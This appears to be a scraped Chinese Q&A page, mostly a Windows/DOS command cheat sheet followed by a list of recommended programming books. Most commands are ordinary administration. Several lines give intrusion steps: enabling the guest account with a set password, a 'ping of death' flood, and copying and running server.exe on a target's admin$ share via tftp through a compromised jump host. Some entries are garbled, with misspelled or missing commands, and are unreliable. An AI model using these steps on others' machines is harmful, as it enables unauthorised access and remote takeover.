net config 顯示系統網路設置
net logoff 斷開連接的共享
net pause 服務名暫停某服務
net send ip "文本信息" 向對方發信息
net ver 區域網內正在使用的網路連接類型和信息
net share 查看本地開啟的共享
net share ipc$ 開啟ipc$共享
net share ipc$ /del 刪除ipc$共享
net share c$ /del 刪除C：共享
net user guest 12345 用guest用戶登陸後用將密碼改為12345
net password 密碼更改系統登陸密碼
netstat -a 查看開啟了哪些埠,常用netstat -an
netstat -n 查看埠的網路連接情況，常用netstat -an
netstat -v 查看正在進行的工作
netstat -p 協議名例：netstat -p tcq/ip 查看某協議使用情況（查看tcp/ip協議使用情況）
netstat -s 查看正在使用的所有協議使用情況
nbtstat -A ip 對方136到139其中一個埠開了的話，就可查看對方最近登陸的用戶名（03前的為用戶名）-注意：參數-A要大寫
tracert -參數 ip(或計算機名) 跟蹤路由（數據包），參數："-w數字"用於設置超時間隔。
ping ip(或域名) 向對方主機發送默認大小為32位元組的數據，參數："-l[空格]數據包大小"；"-n發送數據次數"；"-t"指一直
ping。
ping -t -l 65550 ip 死亡之ping(發送大於64K的文件並一直ping就成了死亡之ping)
ipconfig (winipcfg) 用於windows NT及XP(windows 95 98)查看本地ip地址，ipconfig可用參
數"/all"顯示全部配置信息
tlist -t 以樹行列表顯示進程(為系統的附加工具，默認是沒有安裝的，在安裝目錄的Support/tools文件夾內)
kill -F 進程名加-F參數後強制結束某進程(為系統的附加工具，默認是沒有安裝的，在安裝目錄的Support/tools文件夾內)
del -F 文件名加-F參數後就可刪除只讀文件,/AR、/AH、/AS、/AA分別表示刪除只讀、隱藏、系統、存檔文件，/A-R、/A-
H、/A-S、/A-A表示刪除除只讀、隱藏、系統、存檔以外的文件。例如"DEL/AR *.*"表示刪除當前目錄下所有隻讀文件，"DEL/A-
S *.*"表示刪除當前目錄下除系統文件以外的所有文件
二：
del /S /Q 目錄或用：rmdir /s /Q 目錄 /S刪除目錄及目錄下的所有子目錄和文件。同時使用參數/Q 可取消刪除操作時的系統
確認就直接刪除。（二個命令作用相同）
move 盤符路徑要移動的文件名存放移動文件的路徑移動後文件名移動文件,用參數/y將取消確認移動目錄存在相同文件的提示就直接覆蓋
fc one.txt two.txt > 3st.txt 對比二個文件並把不同之處輸出到3st.txt文件中，"> "和"> >" 是重定向命
令
at id號開啟已注冊的某個計劃任務
at /delete 停止所有計劃任務，用參數/yes則不需要確認就直接停止
at id號 /delete 停止某個已注冊的計劃任務
at 查看所有的計劃任務
at ip time 程序名(或一個命令) /r 在某時間運行對方某程序並重新啟動計算機
finger username @host 查看最近有哪些用戶登陸
telnet ip 埠遠和登陸伺服器,默認埠為23
open ip 連接到IP（屬telnet登陸後的命令）
telnet 在本機上直接鍵入telnet 將進入本機的telnet
路徑文件名1 路徑文件名2 /y 復制文件1到指定的目錄為文件2，用參數/y就同時取消確認你要改寫一份現存目錄文件
c:srv.exe ipadmin$ 復制本地c:srv.exe到對方的admin下
cppy 1st.jpg/b+2st.txt/a 3st.jpg 將2st.txt的內容藏身到1st.jpg中生成3st.jpg新的文件，註：
2st.txt文件頭要空三排，參數：/b指二進制文件，/a指ASCLL格式文件
ipadmin$svv.exe c: 或:ipadmin$*.* 復制對方admini$共享下的srv.exe文件（所有文
件）至本地C：
x 要復制的文件或目錄樹目標地址目錄名復制文件和目錄樹，用參數/Y將不提示覆蓋相同文件
tftp -i 自己IP(用肉機作跳板時這用肉機IP) get server.exe c:server.exe 登陸後，將"IP"的
server.exe下載到目標主機c:server.exe 參數：-i指以二進制模式傳送，如傳送exe文件時用，如不加-i 則以ASCII模式
（傳送文本文件模式）進行傳送
tftp -i 對方IP put c:server.exe 登陸後，上傳本地c:server.exe至主機
ftp ip 埠用於上傳文件至伺服器或進行文件操作，默認埠為21。bin指用二進制方式傳送（可執行文件進）；默認為ASCII格式傳送(文
本文件時)
route print 顯示出IP路由，將主要顯示網路地址Network addres，子網掩碼Netmask，網關地址Gateway
addres，介面地址Interface
arp 查看和處理ARP緩存，ARP是名字解析的意思，負責把一個IP解析成一個物理性的MAC地址。arp -a將顯示出全部信息
start 程序名或命令 /max 或/min 新開一個新窗口並最大化（最小化）運行某程序或命令望採納O(∩_∩)O

Ⅳ 計算機從入門到精通要看哪些書

計算機分軟體，硬體，還有通訊一類等等。
軟體從入門到精通要看的書：
1、C++primer中文版第4版
2、C++標准程序庫自修教程與參考手冊
3、Windows程序設計第5版
4、MFC windows程序設計第2版中文版
5、VC++深入詳解
6、MFC深入淺出
7、Effictive STL
8、Windows核心編程
9、WINDOWS游戲編程大師技巧第2版
10、3D游戲編程大師技巧
11、DirectX角色扮演游戲編程
12、DirectX特效游戲程序設計
13、精通DirectX 3D圖形與動畫程序設計
14、DirectX高級動畫製作
15、Ogre引擎研究
16、游戲人工智慧編程案例精粹
17、Visual C++實踐與提高--網路編程篇
18、C++網路編程，卷1
19、C++網路編程，卷2
20、Visual C++網路游戲建模與實現第2版

硬體：
電腦硬體不求人系統套書、電腦硬體工程師、這方面的書太多了。到書店自己選選擇看吧。但要注意以下要求：
1、如果是零基礎的，就先從最基礎的入手，買一本電腦硬體介紹的書就可以了。
2、如果是已有點功底了想學習硬體維修，就得買一些相關硬體維修方面的書。
3、如果是想了解硬體電路設計與原理，就得買一些原理方面的書，如計算機組成原理等。

通訊：
主要看協議的內容和應用方面的。然後了解數據採集和采樣的原理。

導航:首頁 > 程序命令 > dos命令的書籍

dos命令的書籍

與dos命令的書籍相關的資料